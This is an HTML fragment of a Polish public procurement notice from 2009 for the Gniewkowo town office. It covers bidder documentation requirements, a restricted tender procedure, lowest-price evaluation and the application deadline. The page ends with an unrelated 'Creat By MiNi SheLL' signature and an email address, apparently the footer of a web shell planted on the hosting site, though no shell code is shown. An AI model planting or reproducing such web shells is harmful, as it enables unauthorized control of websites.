11.Wykonawcy wspólnie ubiegający się o zamówienie zobowiązani są złożyć do wniosku : 1.pełnomocnictwo udzielone przez wszystkich partnerów do reprezentowania ich w przedmiotowym postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, 2.wykaz wykonawców wspólnie ubiegających się o zamówienie, 3.oświadczenie wykonawców o solidarnej odpowiedzialności za wykonanie zamówienia i wniesienia zabezpieczenia należytego wykonania umowy. 
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa wyżej : składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: a) nie otwarto jego likwidacji ani nie ogłoszono upadłości, b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie. Dokumenty, o których mowa w pkt. lit. a powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia. Dokument, o którym mowa w pkt lit. b, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa wyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. 
Dokumenty mogą być przedstawione w formie oryginałów lub kserokopii dokumentów poświadczonych za zgodność z oryginałem przez wykonawcę lub osobę upoważnioną.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 8.</p><br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> nie dotyczy.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> nie dotyczy.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.07.2009 godzina 10:00, miejsce: Urząd Miejski w Gniewkowie, ul. 17 Stycznia 11, 88-140 Gniewkowo, sekretariat - pokój nr 6.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com